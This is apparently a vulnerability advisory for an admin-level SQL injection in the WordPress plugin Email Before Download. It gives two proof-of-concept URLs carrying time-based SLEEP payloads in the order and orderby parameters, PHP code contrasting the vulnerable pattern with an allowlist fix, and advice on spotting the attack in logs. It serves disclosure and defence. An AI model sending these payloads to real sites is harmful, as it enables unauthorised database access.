Source: wpexploit | Author: Anton Sarsadskikh | WPEX-ID: A8625B84-337D-4C4D-A698-73E59D1F8EE1
History: Nov 01, 2021 - 12:00 a.m.

Email Before Download < 6.8 - Admin+ SQL Injection

Published: 2021-11-01 00:00:00
Author: Anton Sarsadskikh

EPSS: 0.001 (Low), Percentile: 37.7%

The plugin does not properly validate and escape the `order` and `orderby` GET parameters before using them in SQL statements, leading to SQL injection exploitable by authenticated users (Admin+, per the title).

https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+%28SELECT+1554+FROM+%28SELECT%28SLEEP%285%29%29%29gPZH%29

https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29
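The root cause described above is a common WordPress pattern: `order` and `orderby` are identifiers and keywords, not string literals, so quoting or escaping them does nothing; the only sound fix is to reduce both to a fixed allowlist. The following is an added illustration written for this record, not the plugin's own code; the table name `ebd_links`, the column list and the function names are assumptions.

```php
<?php
// Added illustration (not the plugin's code). Assumes a hypothetical table
// {$wpdb->prefix}ebd_links with columns id, email and time_requested.

// VULNERABLE PATTERN: request values are interpolated straight into ORDER BY.
// esc_sql() or $wpdb->prepare() would not help here, because ORDER BY takes
// identifiers, not quoted values; whatever arrives in the parameter becomes
// part of the query text.
function ebd_links_query_unsafe( $wpdb ) {
    $orderby = isset( $_GET['orderby'] ) ? $_GET['orderby'] : 'time_requested';
    $order   = isset( $_GET['order'] ) ? $_GET['order'] : 'desc';
    $table   = $wpdb->prefix . 'ebd_links';
    return "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
}

// HARDENED PATTERN: both parameters are mapped onto an allowlist defined in
// this file, so the only strings that can ever reach the SQL are ones the
// plugin author wrote. Anything else silently falls back to the default.
function ebd_links_query_safe( $wpdb ) {
    $allowed_orderby = array( 'id', 'email', 'time_requested' );
    $allowed_order   = array( 'ASC', 'DESC' );

    // sanitize_key() lowercases and strips everything outside [a-z0-9_-],
    // which already removes spaces, parentheses and quotes.
    $orderby = isset( $_GET['orderby'] )
        ? sanitize_key( wp_unslash( $_GET['orderby'] ) )
        : 'time_requested';
    $order = isset( $_GET['order'] )
        ? strtoupper( sanitize_key( wp_unslash( $_GET['order'] ) ) )
        : 'DESC';

    // Strict comparison against the allowlist; unknown values are discarded.
    if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
        $orderby = 'time_requested';
    }
    if ( ! in_array( $order, $allowed_order, true ) ) {
        $order = 'DESC';
    }

    $table = $wpdb->prefix . 'ebd_links';
    // Safe to interpolate: every piece is a constant chosen by the code above.
    // Any user-supplied *values* (filters, search terms) would still go
    // through $wpdb->prepare() with placeholders.
    return "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
}
```

WordPress also ships `sanitize_sql_orderby()`, which returns `false` unless the string is a comma-separated list of bare column names with optional `ASC`/`DESC`, so it would reject the payloads in the URLs above; an explicit allowlist is still the tighter choice because it also rejects column names the page never intended to expose. For detection, the PoC requests are easy to spot in access logs: a `page=email-before-download-links` request whose `order` or `orderby` value contains anything other than a short identifier (spaces, parentheses, `SELECT`, `SLEEP`) is not something the legitimate admin UI generates.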
